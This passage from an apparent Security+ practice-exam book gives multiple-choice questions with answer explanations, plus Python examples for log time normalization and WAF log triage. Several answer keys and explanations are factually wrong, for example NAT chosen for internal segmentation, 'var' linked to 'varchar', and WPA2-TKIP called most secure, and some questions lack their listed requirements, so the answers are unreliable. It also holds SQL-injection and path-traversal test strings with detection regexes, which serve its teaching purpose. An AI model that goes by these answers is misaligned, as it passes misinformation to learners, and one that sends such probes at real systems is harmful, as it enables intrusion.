A. PEM certificate

B. Wildcard certificate

C. Subject Alternative Name (SAN) certificate

D. Root certificate

Answer: B

Concept: A wildcard certificate can be used on multiple servers in the same domain.

Wrong answers:

A. PEM is a base64 format

C. A SAN certificate can be used in servers in different domains

D. A root certificate can only be used by a CA

  1. You are the manager of a large IT company, and it is your duty to authorize administrative controls. Which of the following are actions that you would NORMALLY authorize? Select all that apply:

A. Collecting an ID badge

B. Creating an IT security policy

C. Purchasing a cable lock

D. Creating a new firewall rule

Answer: A and B

Concept: Writing policies, filling out forms, and anything to do with applying for ID badges are administrative controls.

Wrong answers:

C. A cable lock is a physical control

D. A firewall rule is a technical control to mitigate risk

  1. You are the operational manager for a financial company that has just suffered a disaster. Which of the following sites will you choose to be fully operational in the least amount of time?

A. Cold site

B. Warm site

C. Hot site

D. Campus site

Answer: C

Concept: The hot site should be up and running with data less than one hour old.

Wrong answers:

A. The cold site is the hardest site to get up and running, and it only has power and water

B. A warm site has noncritical data, and the data is about a day old

D. This is a red herring, and has nothing to do with disaster recovery

  1. The serious crimes agency has just taken control of a laptop belonging to a well-known criminal that they have been trying to track down for the last 20 years. They want to ensure that everything is done by the book and no errors are made. What is the first step in their forensic investigation, prior to starting the chain of custody?

A. Making a system image of the laptop

B. Placing the laptop in a polythene bag and sealing it

C. Hashing the data so that data integrity is assured

D. Asking for proof of ownership of the laptop

Answer: A

Concept: The first step is to create a system image; or, if it is a hard drive, create a forensic copy.

Wrong answers:

B. This is the second step

C. This is one of the steps when we start to investigate the contents of the laptop

D. This is not relevant

  1. If an attacker is looking for information about the software versions that you use on your network, which of the following tools could they use? Select all that apply:

A. Protocol analyzer

B. Port scanner

C. Network mapper

D. Baseline analyzer

Answer: A and C

Concept: A network mapper (Nmap) can identify new hosts on the network, identify what services are running, and identify what operating systems are installed. A protocol analyzer can tell what operating systems run on network hosts; this is sometimes called a packet sniffer.

Wrong answers:

B. A port scanner only tells you which ports are open

D. A baseline analyzer is a vulnerability scanner, and tells you about missing patches

  1. Footage of people relaxing in their homes started appearing on the internet without the knowledge of the people being filmed. The people being filmed were warned by relatives and coworkers, resulting in an inquiry being launched by the police. Initial evidence reported that the victims had recently purchased IoT devices, such as health monitors, baby monitors, smart TVs, and refrigerators. Which of the following best describes why the attacks were successful?

A. The devices' default configurations had not been changed

B. The victims' houses had been broken into and hidden cameras were installed

C. The victims' wireless networks were broadcasting beyond the boundaries of their homes

D. The manufacturers of the devices installed hidden devices to allow them to film

Answer: A

Concept: IoT home-based automated devices should have the default configurations of the username and password changed.

Wrong answers:

B. This would be very unlikely for so many people

C. This may be a possibility, but is unlikely to be the main reason

D. This would not happen, or the manufacturer would lose their market share

  1. You are the network administrator for an IT training company that has over 20 training rooms that are all networked together in their Miami office. Your corporate admin team could not access the internet last week as they were getting their IP settings from one of the training room's DHCP servers. The training manager has asked you to separate the corporate admin machines into their own network with a different IP range from the training rooms. What is the most secure way of implementing this? Select the best option from the following list:

A. Create a VLAN on the switch and put the corporate admin team in the VLAN

B. Install a router in the LAN and place the corporate admin team in the new subnet

C. Create a NAT from the firewall and put the corporate machines in that network

D. Install a proxy server

Answer: C

Concept: A NAT hides the internal network from external resources and will separate the training machines from the corporate admin machines.

Wrong answers:

A. Putting a VLAN on the switch will segment the two networks, but it's not the best option

B. Installing a router creates a subnet and would also segment the two entities, but this is not the best option either

D. A proxy caches web pages and also filters traffic to and from the internet

  1. Your organization has many different ways of connecting to your network, ranging from VPN and RAS to 802.1x authentication switches. You need to implement a centrally managed authentication system that will allow for long periods of access. Select the two most suitable methods of authentication:

A. PAP

B. TACACS+

C. NTLM

D. RADIUS

Answer: B and D

Concept: AAA servers are used for centralized authentication, as they provide authentication, authorization, and accounting, and they can record all log-ins and log-outs in a database.

Wrong answers:

A. PAP is a weak authentication system where passwords are shown in clear text

C. NTLM is a weak authentication protocol that is susceptible to pass-the-hash attacks

  1. From a security perspective, what is the MAJOR benefit of using imaging technologies such as Microsoft WDS or Symantec Ghost to image desktops and laptops that are being rolled out?

A. It provides a consistent baseline for all new machines

B. It ensures that all machines are patched

C. It reduces the number of vulnerabilities

D. It allows a non-technical person to roll out the images

Answer: A

Concept: When you build an image, all of the applications will have the same settings and updates and therefore will be consistent. A baseline consists of the applications that are installed at the current time.

Wrong answers:

B. Updates come out almost every week, so you will still need to patch an image, especially if it was taken a month or two ago

C. Vulnerabilities are discovered on a frequent basis; therefore, this is not true

D. The fact is true, but from a security point of view it could pose a risk

  1. A company that is allowing people to access their internet application wants the people who log into the application to use an account managed by someone else. An example of this is a user accessing their Facebook account with a technology called Open ID Connect. Which of the following protocols is this based on? Select the BEST choice:

A. Kerberos

B. SAML

C. OAuth 2.0

D. Federation services

Answer: C

Concept: OAuth 2.0 is the industry-standard protocol for authorization. It is used by Open ID Connect, where people can be authenticated using their Facebook or Google account.

Wrong answers:

A. Kerberos is used only in Microsoft Active Directory

B. SAML is an XML-based authentication used in federation services

D. Federation services is third-party-to-third-party authentication that uses SAML, an XML-based authentication protocol

  1. You are the security administrator for a medium-sized company that needs to enforce a much stricter password policy via Group Policy. The aims of this policy are to do the following:

Prevent using the same password within 12 password changes

Select the following options that you will need to use to fulfill all of these goals:

A. Enforce password history

B. Minimum password length

C. Passwords must meet complexity requirements

D. Minimum password age

E. Maximum password length

Answers: A and C

Concept: The password history is the number of passwords that you need to remember before you can reuse them. Password complexity requires users to use three of the following four character types in the password: lower case, upper case, numbers, and special characters not used in programming. A minimum password age set to 1 means that you can change the password only once a day, preventing password rotation until you get back to the original password.

Wrong answers:

B. Password length was a requirement, but the longer the password length, the longer it will take a brute force attack to crack

E. In a group policy, there is no option for maximum password length

  1. You provide a service for people who have recently fulfilled their contract with their mobile phone provider to unlock their phone and then install third-party applications on it. They will then no longer be tied to using the mobile phone vendor's app store. Which of the following techniques will you use to achieve this? Select all that apply:

A. Tethering

B. Sideloading

C. Slipstreaming

D. Jailbreaking or rooting

E. Degaussing

Answers: B and D

Concept: Sideloading involves loading third-party applications onto an unlocked mobile phone. Jailbreaking (iOS), or rooting (Android), is where the phone has been unlocked, removing the vendor's restrictions on the mobile phone.

Wrong answers:

A. Tethering involves connecting your phone to a laptop to give the laptop internet access

C. Slipstreaming is a technique for installing drivers into an .iso file

E. Degaussing involves passing a charge over a hard drive to erase data

  1. You are the security administrator of a multinational company that has recently prevented brute-force attacks by using account lockout settings with a low value via group policy. The CEO of the company has now dictated that the company will no longer use account lockout settings, as he read an article about it and got the wrong impression. Facing this dilemma, how can you make it more difficult for brute-force attacks to be successful?

A. Obfuscation

B. PBKDF2

C. XOR

D. bcrypt

Answer: B and D

Concept: PBKDF2 and bcrypt are key-stretching algorithms that insert random characters into password hashes, making them longer so that brute-force attacks need more processing and computation resources to crack them.

Wrong answers:

A. Obfuscation makes code obscure so that if someone steals your code, they cannot make sense of it

C. XOR (exclusive OR) can be used to encrypt binary numbers

  1. You want to join a wireless network using a password. Which of the following wireless features would be most appropriate to achieve this objective?

A. WPA2-Enterprise

B. WPA2-TKIP

C. WPS

D. WPA2-PSK

E. WPA2-CCMP

Answer: D

Concept: PSK uses the WAP password to join the network.

Wrong answers: 

A. WPA2-Enterprise uses 802.1x with RADIUS for authentication

B. WPA2-TKIP is backward compatible with legacy devices

C. WPS pushes a button to access the network

E. WPA2-CCMP is the strongest encryption, as it uses AES

  1. What is the main purpose of a Network Intrusion Detection System (NIDS)? Select the MOST appropriate option:

A. Identifying vulnerabilities

B. Identifying new network hosts

C. Identifying viruses

D. Identifying new web servers

Answer: B

Concept: NIDS identifies changes to the network and the network traffic.

Wrong answers:

A. This is the job of a vulnerability scanner

C. This is the job of a virus scanner

D. Web servers are not based in the LAN; normally, they are based in the DMZ

  1. A web server was the victim of an integer-overflow attack. How could this be prevented in the future?

A. Install a proxy server

B. Install SQL-injection

C. Input validation on forms

D. Install a web application firewall

Answer: C

Concept: Input validation prevents buffer-overflow attacks, integer-overflow attacks, and SQL-injection by restricting the input to a certain format.

Wrong answers:

A. A proxy server is used for web page caching and URL and content filtering

B. SQL-injection is a form of attack where the phrase 1 = 1 is used in a script

D. A web application firewall is used to protect web servers and their applications

  1. You have recently set up a new virtual network with over 1,000 guest machines. One of the hosts is running out of resources, such as memory and disk space. Which of the following best describes what is happening?

A. Virtual machine escape

B. End of system lifespan

C. System sprawl

D. Poor setup

Answer: C

Concept: System sprawl over-utilizes resources. This means that the system has started to run out of resources.

Wrong answers:

A. VM escape is where an attacker uses a virtual machine so that they can attack the host

B. This is where a vendor no longer supports an application

D. This is where the configuration is not set properly

  1. You are the system administrator for a multinational company that wants to implement two-factor authentication. At present, you are using facial recognition as the method of access. Which of the following would allow you to achieve two-factor authentication? Select all that apply:

A. Palm reader

B. Signature verification

C. Thumb scanner

D. Gait

E. Iris scanner

Answer: B and D

Concept: Facial recognition is something you are for authentication. B and D are both something you do—you have a unique signature and your gait is how you walk.

Wrong answers:

A, C, and E all come under the something you are category.

  1. The security auditor has just visited your company and is recommending change management to reduce the risk from the unknown vulnerabilities of any new software introduced into the company. What will the auditor recommend for reducing the risk when you first evaluate the software? Select the BEST practices to adopt from the following list:

A. Jailbreaking

B. Sandboxing

C. Bluesnarfing

D. Chroot jail

E. Fuzzing

Answer: B and D

Concept: Sandboxing and chroot jail allow you to isolate an application inside a virtual guest machine.

Wrong answers:

A. This is the removal of the restrictions that Apple sets on an iOS device

C. This is stealing contacts from a mobile device

E. This is putting random characters into an application

  1. You are the security administrator for a multinational corporation. You recently detected and thwarted an attack on your network when someone hacked into your network and took full control of one of the hosts. What type of attack best describes the attack you stopped?

A. Man-in-the-middle attack

B. Replay attack

C. Packet filtering

D. Remote exploit

Answer: D

Concept: An exploit looks for vulnerabilities in a system; a remote exploit is someone coming from outside your network.

Wrong answers:

A. A man-in-the-middle attack is an interception attack where messages are changed in real time as they pass between two hosts

B. A replay attack is a man-in-the-middle attack where the messages are replayed at a later date

C. Packet filtering is used by a firewall to stop certain protocols from accessing your network

  1. You are the security administrator for a multinational corporation that recently carried out a security audit. Following the audit, you told the server administrators to disable NTLM on all servers. Which of the following best describes why you have taken this action?

A. It will improve the server's performance

B. Prevent a man-in-the-middle attack

C. Prevent a pass-the-hash attack

D. Prevent a POODLE attack

Answer: C

Concept: Disabling NTLM will prevent pass-the-hash attacks.

Wrong answers:

A. This is a red herring; it has nothing to do with performance

B. A man-in-the-middle attack is an interception attack

D. A POODLE attack is a man-in-the-middle attack that targets downgrade browsers—SSL3.0 CBC

  1. The political adviser to the prime minister of the United Kingdom has returned from the two-month summer break that all staff are entitled to. He applied for an immediate transfer to another department, stating that his health is bad and the job was far too intense. When his replacement arrives, they find that during the summer recess, the political adviser shredded all documents relating to a political inquiry that involved their cousin. The police are immediately called in and say that they cannot prosecute the political adviser because of a lack of evidence. What precautions could the House of Parliament security team take to prevent further events such as this happening in the future?

A. Create a change-management document to ensure that the receptionists are more vigilant about people coming in out of hours

B. Enforce time-of-day restrictions so that nobody can access the IT systems during summer breaks

C. Enforce separation of duties to ensure that any document that is destroyed has been witnessed by a second person

D. Enforce mandatory vacations to prevent staff coming in during the recess

Answer: B

Concept: Time-of-day restrictions would have prevented someone accessing the system during the holidays.

Wrong answers:

A. If the staff of the House of Commons are on holiday, then there will be no receptionists present

C. Separation of duties cannot be enforced during a shutdown period

D. Mandatory vacations cannot be enforced when nobody is working

  1. You work in the forensics team of a very large multinational corporation where an attack has happened across three different sites in two different countries. You have been collecting the following log files from these locations:

What is the first action that you need to take when collating these logs?

A. Apply time normalization to these logs

B. Copy them into a worm drive so that they cannot be tampered with

C. Sort out the sequence of events by site

D. Raise chain of custody documentation for these logs

Answer: A

Concept: When collating forensic evidence, it needs to be put in a time sequence. In this case, we use time normalization to put it all in order. If we collect physical evidence from different computers, we use the record time offset to put the data and events in time sequence by using the regional time on the machine.

Wrong answers:

B. Copying into a worm drive will prevent deletion, but not the analysis of data.

C. This could be a first step, but it will not collate the information properly.

D. A chain of custody would be needed once you hand the evidence to someone else, but it is too early at this time for this. A chain of custody records who has handled the evidence.
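The time normalization described in this answer, as an added example that is not part of the book: each site logs local time with no zone marker, so every line is converted to UTC and corrected for that machine's recorded clock offset before the events are ordered. The log lines, site offsets, and clock skews are constructed for illustration; the offsets are the summer-time offsets in force on the constructed date.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample log lines, one list per site. Each site writes local
# time without a zone marker, so the lines cannot be ordered as they stand.
SITE_LOGS = {
    "london": [
        "2019-08-12 14:05:10 ssh login user=svc_backup src=10.1.1.7",
        "2019-08-12 14:07:42 sudo COMMAND=/bin/tar -czf /tmp/hr.tgz /srv/hr",
    ],
    "newyork": [
        "2019-08-12 09:06:30 smb open fs01/hr/payroll.xlsx user=svc_backup",
    ],
    "berlin": [
        "2019-08-12 15:04:55 vpn connect user=svc_backup ip=203.0.113.9",
    ],
}

# Fixed UTC offsets (hours) for each site on the constructed date:
# London is on BST (+1), New York on EDT (-4), Berlin on CEST (+2).
SITE_UTC_OFFSET = {"london": 1, "newyork": -4, "berlin": 2}

# Record time offset: how far each machine's clock ran AHEAD of a trusted
# reference when the evidence was collected (negative = clock was slow).
CLOCK_SKEW = {
    "london": timedelta(0),
    "newyork": timedelta(minutes=-1),   # one minute slow
    "berlin": timedelta(seconds=30),    # thirty seconds fast
}


def normalize(site, line):
    """Return (utc_timestamp, site, message) for one raw log line."""
    ts_text, message = line[:19], line[20:]
    local_zone = timezone(timedelta(hours=SITE_UTC_OFFSET[site]))
    local = datetime.strptime(ts_text, "%Y-%m-%d %H:%M:%S").replace(tzinfo=local_zone)
    # Convert to UTC, then remove the machine's own clock error.
    true_utc = local.astimezone(timezone.utc) - CLOCK_SKEW[site]
    return true_utc, site, message


def build_timeline(site_logs):
    """Normalize every line from every site and order them by true UTC time."""
    events = [normalize(site, line) for site, lines in site_logs.items() for line in lines]
    events.sort(key=lambda event: event[0])
    return events


if __name__ == "__main__":
    for when, site, message in build_timeline(SITE_LOGS):
        print(f"{when.isoformat()} [{site:8}] {message}")
```

Once sorted, the Berlin VPN connection is visible as the first step, followed by the London login, the New York file access, and the London archive command, an order that the raw local timestamps hide.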

  1. You are an Active Directory administrator and have been having problems with time synchronization regarding the Kerberos authentication protocols. Consequently, you have now contacted a third party to provide your time synchronization. They use Stratum Network Time Protocol (NTP) servers. What is the MOST secure method of setting up a Stratum server for time synchronization?

A. Having the servers connect to an internal Stratum 1 NTP server

B. Having the servers connect to an internal Stratum 2 NTP server

C. Having the servers connect to an internal Stratum 0 NTP server

D. Having the servers connect to an external Stratum 0 NTP server

Answer: A

Concept: The time server must be internal. The Stratum 1 NTP server connects to the Stratum 0 NTP server, which is the ultimate time source. However, if there is no internal Stratum 1 NTP server, then we will use an internal Stratum 0 NTP server.

Wrong answers:

B. A Stratum 2 server can only connect to a Stratum 1 time server

C. Only use an internal Stratum 0 server when an internal Stratum 1 server is not available

D. The connection to the time server should come from the internal network

  1. You are the network administrator for a company that runs an Active Directory domain environment where the system administrator is failing to keep you updated when new hosts are added to the network. You now decide that you will use your networking tools to do the following:

Which of the following network-based tools provide the information that you require? Select the tools that you are MOST likely to use:

A. Protocol scanner

B. Microsoft baseline analyzer

C. Nmap

D. Penetration testing

Answers: A and C

Concept: Protocol scanners and network mappers can identify new hosts, operating system versions, and services that are running. An NIDS can detect new hosts.

Wrong answers:

B. The Microsoft baseline analyzer is a vulnerability scanner

D. A penetration tester is trying to break into your network

  1. You are working for the serious crimes unit of the United Nations and have been given a laptop to investigate. You need to ensure that the evidence you are investigating has not been tampered with during your investigation. How are you going to prove this to the court when it is time to present your findings? Which of the following techniques will you adopt to BEST prove this? Select all that apply:

A. MD5

B. 3DES

C. SHA1

D. Blowfish

Answer: A and C

Concept: Hashing proves data integrity, and SHA1 and MD5 are both hashing algorithms.

Explanation: When data is collected as part of a chain of custody, all data is hashed with SHA1, MD5, or HMAC prior to looking through the data. When you finish the investigation, you run the hash a second time; if the hash matches, then the data integrity is confirmed.

Wrong answers:

B and D are both used with encryption, not hashing.

  1. You are the security administrator for a multinational corporation that has an Active Directory domain. What type of attack uses HTML tags with JavaScript inserted between the <script> and </script> tags?

A. Cross-site scripting

B. Man-in-the-middle

C. Cross-site forgery attack

D. SQL-injection

Answer: A

Concept: Cross-Site Scripting (XSS) uses HTML tags with JavaScript. JavaScript can be identified by using the word var for variable—for example, varchar or var data.

  1. You are a system administrator working for a multinational company that has a windows domain and is using an active-passive model. Which of the following are the BEST reasons why your company would have adopted this model?

A. It provides vendor diversity

B. It provides much faster disaster recovery

C. It is the best model to use for symmetric encryption

D. It provides availability of your IT systems

Answers: B and D

Concept: Clustering provides availability, and it has a quick failover to the passive host should the active host fail.

Explanation: We would use an active-passive or active-active setup in the failover cluster so that if one node failed, the passive or second server would be up and running within seconds; users would not even be aware of this. This provides both faster disaster recovery and 99.999% availability, otherwise known as the five nines.

Wrong answers:

A. The cluster would come from the same vendor

C. Clustering is about availability—nothing to do with encryption

  1. You are the system administrator for an Active Directory domain and deal with authentication on a daily basis. Which of the following do you use as an authentication method by entering a PIN instead of a password?

A. Smart card

B. Kerberos

C. WPS

D. TOTP

Answer: A

Concept: A smart card uses a PIN.

Wrong answers:

B. Kerberos can be accessed by entering a username and password

C. WPS is accessed by pushing a button to connect to a wireless network

D. TOTP uses a secret key or code

  1. You are the security administrator for a large multinational corporation and you have a meeting with the CEO about the security posture of the company. He wants you to ensure the following are carried out effectively:

Which of the following are the BEST solutions to implement? Select all that apply:

A. Robocopy firewall logs to a worm drive

B. Robocopy firewall logs to a RAID 5 volume

C. Implement usage auditing and reviews

D. Carry out permission audits and reviews every seven days

Answer: A and D

Concept: Storing files on a worm drive prevents deletion. Continuous audits of permissions will help track escalations of privilege.

Wrong answers:

B. Storing data on a RAID volume is a solution for redundancy, but not the deletion of data

C. Account reviews may be quarterly, and so are not the best option

  1. You are the security administrator for a multinational company, and you know that one of your X509 certificates, used in at least 300 desktop machines, has been compromised. What action are you going to take to protect the company, using the LEAST amount of administrative effort?

A. Email the people involved and ask them to delete the X509 from their desktop immediately

B. Carry out certificate pinning to prevent the CA from being compromised

C. Revoke the root CA X509 so it is added to the CRL

D. Revoke the X509 so it is added to the CRL

Answer: D

Concept: Once a certificate has been compromised, it should immediately be revoked so it is added to the CRL.

Wrong answers:

B. Certificate pinning cannot be set up after an event; it is set up to protect the CA against being compromised. This was only a low-level X509 that was compromised

C. There is no reason to revoke the root CA certificate as the certificate authority has not been compromised

  1. You need to install a new wireless access point that should be as secure as possible while also being backward compatible with legacy wireless systems. Which of the following would help you in this?

A. WPA2 PSK

B. WPA

C. WPA2 CCMP

D. WPA2 TKIP

Answer: D

Concept: WPA2 is the most secure and TKIP is backward compatible.

Wrong answers:

A. WPA2 is used to connect to the wireless access point using a password

B. Although WPA is backward compatible, it is not strong

C. Although WPA2 CCMP is the most secure, it is not backward compatible

  1. You are the capacity planning administrator for a large multinational corporation, and find that Server 1 is running out of disk space. When you monitor its network card, it is at 100% utilization. Which of the following reasons best describes what is happening?

A. There are hardware errors on the server

B. Unauthorized software is being downloaded

C. Event logs are getting full and slowing down the system

D. The disks that were selected were too small

Answer: B

Concept: Unauthorized software takes up disk space and causes high network utilization.

Wrong answers:

A. If there were hardware errors, no download would have happened, and there would not be a decrease in disk space

C. The event logs are text files and will not use up too much space

D. This is not a good choice as the disks that are purchased would be of a reasonable size

  1. You are the security administrator and someone has just tried to attack your web server, which is protected by a web application firewall. When you look into the log files of the web application firewall, two of the rows of the log file have the following two entries:

var data = "<blackbeard> ++ </../etc/passwd>"

Select* from customers where 1=1

Which of the following attacks are most likely to have been attempted? Select all that apply:

A. Integer-overflow

B. SQL-injection

C. JavaScript

D. Buffer-overflow

Answers: B and C

Concept: An SQL-injection attack uses the phrase 1 = 1. JavaScript is commonly used in XSS attacks and uses the var variable, so if you see var, it is most likely to be JavaScript.

Wrong answers:

A. Integer-overflow is where larger numbers are used than should be used, normally with multiplication

D. Buffer-overflow is where more characters are used than should be. The strcat and strcpy functions are known to cause buffer-overflow
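The two log entries in this question, run through a small triage routine as an added example that is not part of the book: each web application firewall line is matched against the markers the answer describes (the 1=1 tautology for SQL injection, the var keyword and script tags for JavaScript) so an analyst can label and count attempts per source. The log lines beyond the two from the question, the field layout, and the signature patterns are constructed for illustration.

```python
import re
from collections import Counter

# Constructed WAF log lines: the two entries from the question plus benign
# traffic and one further injection probe. Layout: timestamp, source IP,
# method, then the request as the firewall recorded it.
WAF_LOG = [
    '2019-08-12T13:05:10Z 203.0.113.9 POST /search q=var data = "<blackbeard> ++ </../etc/passwd>"',
    "2019-08-12T13:05:12Z 203.0.113.9 GET /customers?id=Select* from customers where 1=1",
    "2019-08-12T13:05:15Z 198.51.100.4 GET /customers?id=42",
    "2019-08-12T13:05:20Z 203.0.113.9 GET /login?user=admin' OR '1'='1",
]

# Detection signatures, labelled with the attack names used in the answer.
# Patterns are illustrative, not an exhaustive ruleset.
SIGNATURES = {
    # always-true comparison, or a quoted OR, typical of SQL injection probes
    "SQL-injection": re.compile(r"\b1\s*=\s*1\b|'\s*or\s*'|\bunion\s+select\b", re.IGNORECASE),
    # JavaScript markers used in cross-site scripting payloads
    "JavaScript": re.compile(r"<\s*script\b|\bvar\s+\w+\s*=|\bdocument\.cookie\b", re.IGNORECASE),
}


def classify(line):
    """Return the list of attack labels whose signature matches this line."""
    return [label for label, pattern in SIGNATURES.items() if pattern.search(line)]


def triage(log_lines):
    """Label every line and count flagged attempts per source IP.

    Returns (labelled, per_source) where labelled is a list of
    (timestamp, source_ip, labels) and per_source maps IP -> attempt count.
    """
    labelled = []
    per_source = Counter()
    for line in log_lines:
        timestamp, source_ip, _rest = line.split(" ", 2)
        labels = classify(line)
        labelled.append((timestamp, source_ip, labels))
        if labels:
            per_source[source_ip] += 1
    return labelled, per_source


if __name__ == "__main__":
    rows, counts = triage(WAF_LOG)
    for timestamp, source_ip, labels in rows:
        print(timestamp, source_ip, ", ".join(labels) or "-")
    print("flagged attempts per source:", dict(counts))
```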

  1. Data has previously only been classified as internal data and external data. The company recently added two new classifications: legal and financial. What would be the benefit of these new classifications? Select the best solution for the new data classifications:

A. You need a minimum of three classifications for it to be effective

B. Better data classification

C. Quicker indexing

D. Faster searching

Answer: B

Concept: The more data classifications there are, the easier to classify it will be.

Wrong answers:

A. Data classification has no minimum values

C. Indexing will be slower for more classifications

D. Faster searching is done by reducing the amount of data

  1. You are the security administrator for a multinational corporation based in Miami, and your company has recently suffered a replay attack. After lessons learned, you have decided to use a protocol that uses time stamps and USN to prevent replay attacks. Which of the following protocols is being implemented here? Select the best answer:

A. Federation services

B. EAP-TLS

C. Kerberos

D. RADIUS federation

Answer: C

Concept: Kerberos issues tickets for authentication, and each change has a different Updated Sequence Number (USN) and time stamps.

Wrong answers:

A. Federation services use SAML, an XML-based authentication protocol

B. EAP-TLS uses certificates and is used for wireless authentication

D. The RADIUS federation is a federation that uses wireless as its method of access

  1. Which of the following threat actors would be the most likely to steal a company's R&D data?

A. Organized criminals

B. A competitor

C. A script kiddie

D. A nation state

Answer: B

Concept: The R&D department creates a lot of a company's trade secrets; therefore, a competitor would steal them to beat you to the marketplace.

Wrong answers:

A. Organized crime is most likely to target financial transactions rather than R&D data

C. A script kiddie reuses someone else's scripts

D. A nation state is more interested in attacking foreign governments than R&D data

  1. You are a security administrator for a large multinational corporation based in the United Kingdom. You have just attended an annual seminar about the various types of password attacks. You have already disabled NTLM on all of the servers to prevent pass-the-hash attacks. Which of the following statements involves storing passwords as a hash value?

A. A collision attack, the hash value and the data match

B. A collision attack, the hash values match

C. A rainbow-table attack performs a search of simple passwords

D. A rainbow-table attack performs a search of precomputed hashes

Answer: B and D

Concept: A rainbow table is a list of precomputed hashes. A collision attack is where two hashes match.

Wrong answers:

A. When a hash is created, it takes the data inside a file and turns it into a hexadecimal hash value—they don't match

C. This is false; look at the explanation of the concept

  1. You are the new IT Director of a small, family-owned business that is rapidly expanding. You have submitted your annual budget for the IT team and the owners of the company want to know what you have asked for funds for "Vendor diversity". They have asked you to provide two good reasons why they should grant you the funds. Which of the following are the MOST suitable reasons why you wish to implement vendor diversity?

A. Reliability

B. Regulatory compliance

C. It is a best practice in the industry

D. Resiliency

Answer: A and D

Concept: Vendor diversity involves getting a service from two different providers at the same time. Vendor diversity provides reliability and resiliency. For example, if broadband from one provider fails, then the second provider's broadband should still be up and running.

Wrong answers:

B. There are no regulations that say you must get services from two suppliers

C. It is not an industry best practice, though it may well be advisable

  1. You are the network administrator for a large multinational corporation where you have captured packets that show that the traffic between the company's network devices is in clear text. Which of the following protocols could be used to secure the traffic between the company's network devices? Select all that apply.

A. SNMP V 3

B. SNMP

C. SCP

D. SFTP

Answer: A

Concept: Traffic between network devices uses the Simple Network Management Protocol (SNMP); the secure version is SNMPv3.

Wrong answers:

B. SNMP is not secure

C. SCP copies files securely

D. SFTP secures downloaded traffic from FTP sites

  1. You are the auditor of a large multinational corporation and the SIEM server has been finding vulnerabilities on a server. Manual inspection proves that it has been fully hardened and has no vulnerabilities. What are the two main reasons why the SIEM server is producing this output?

A. There was a zero-day virus

B. False negatives

C. False positives

D. The wrong filter was used to audit

Answer: C and D

Concept: If we are using the wrong configuration for the SIEM server, we will get poor monitoring, resulting in false positives.

Wrong answers:

A. A zero-day virus would not have been detected in the first place

B. False negatives allow attacks to happen, but are not detected

  1. You are a forensic investigator who has been called out to deal with a virus attack. You collect the information from the network card and volatile memory. After gathering, documenting, and securing the evidence of a virus attack, what is the best method for preventing further losses to the company?

A. Send a copy of the virus to the lab for analysis

B. Mitigate the attack and get the system back up and running

C. Initiate a chain of custody

D. Initiate business-impact analysis

Answer: B

Concept: Collecting the volatile evidence, mitigating the attack, removing the virus, and getting the system back up and running is the best thing to do. 

Wrong answers:

A. This does not get you back up and running

C. A chain of custody records who has handled the evidence and does not get you back up and running

D. BIA only tells you the losses that you have incurred and does not generate any income

  1. You are the purchasing manager for a very large multinational company, and you are looking at the company's policy that deals with the insurance of laptops. Last year, the company lost a record number of laptops. Your company is losing 10 laptops per month and the monthly insurance cost is $10,000. Which of the following laptop purchases would prevent you from purchasing insurance?

A. Budget laptops at $1,300 each

B. Budget laptops at $1,200 each

C. Budget laptops at $1,000 each

D. Budget laptops at $1,001 each

Answer: C

Concept:

SLE = ALE / ARO

ALE = 12 x $10,000 = $120,000

ARO = 12 x 10 = 120 laptops a year

Single loss expectancy = $120,000 / 120 = $1,000

Explanation: The cost of losing the laptops is $120,000, the same as purchasing the insurance. You should not take out the insurance in the hope that next year you may lose fewer laptops, as a record number of laptops has already been lost. 

Wrong answers:

A, B, and D would cost more than the insurance; therefore, in these cases, you would do better to take out the insurance.

  1. Your company has suffered a system-sprawl attack, and you need to be able to identify what has caused the attack and what the symptoms of the attack are. Which of the following attacks could cause system sprawl and what would be a tell-tale sign of it? Select the BEST two answers; each is a part of the solution:

A. SQL-injection

B. DoS attack

C. CPU at 100% utilization

D. Buffer-overflow

Answer: B and C

Concept: System sprawl is when your resources are running out—for example, if your CPU was at 100% utilization. When your system is running like this, it could also suffer from DoS, which makes resources unavailable with too many SYN flood attacks.

Wrong answers:

A. An SQL-injection attack involves placing the phrase 1 = 1 into a Transact-SQL script

D. A buffer-overflow attack involves putting more data into a field than it was programmed to handle

  1. Which of the following is a measure of reliability?

A. MTTR

B. MTBF

C. MTTF

D. RPO

Answer: B

Concept: Mean Time Between Failures (MTBF) is the measure of the number of failures. If I purchased a car and it broke down every day for the next week, I would take it back, as it would be unreliable.

Wrong answers:

A. MTTR is the mean time to repair. If I break down at 1 pm and it is repaired by 2 pm, the MTTR is 1 hour

C. MTTF is the mean time to failure; this is the lifespan of a piece of equipment

D. RPO is the recovery point objective. It is the amount of time a company can be without its data, meaning the acceptable downtime

  1. Which of the following are the characteristics of a third-party-to-third-party authentication protocol that uses XML-based authentication? Select the three BEST answers:

A. Single Sign-On (SSO)

B. Kerberos

C. SAML

D. Federation services

Answers: A, C, and D

Concept: Federation services is a third-party-to-third-party authentication method that uses SAML, an XML-based method for authentication. It also provides SSO. This means that you only log in once in order to get access to resources.

Wrong answer:

B. Kerberos uses a ticket granting ticket and only works on a Microsoft Active Directory domain.

Other Books You May Enjoy

If you enjoyed this book, you may be interested in these other books by Packt:

Python Penetration Testing Cookbook
Rejah Rehim

ISBN: 9781784399771

Cybersecurity – Attack and Defense Strategies
Yuri Diogenes, Erdal Ozkaya

ISBN: 9781788475297

Leave a review - let other readers know what you think

Please share your thoughts on this book with others by leaving a review on the site that you bought it from. If you purchased the book from Amazon, please leave us an honest review on this book's Amazon page. This is vital so that other potential readers can see and use your unbiased opinion to make purchasing decisions, we can understand what our customers think about our products, and our authors can see your feedback on the title that they have worked with Packt to create. It will only take a few minutes of your time, but is valuable to other potential customers, our authors, and Packt. Thank you!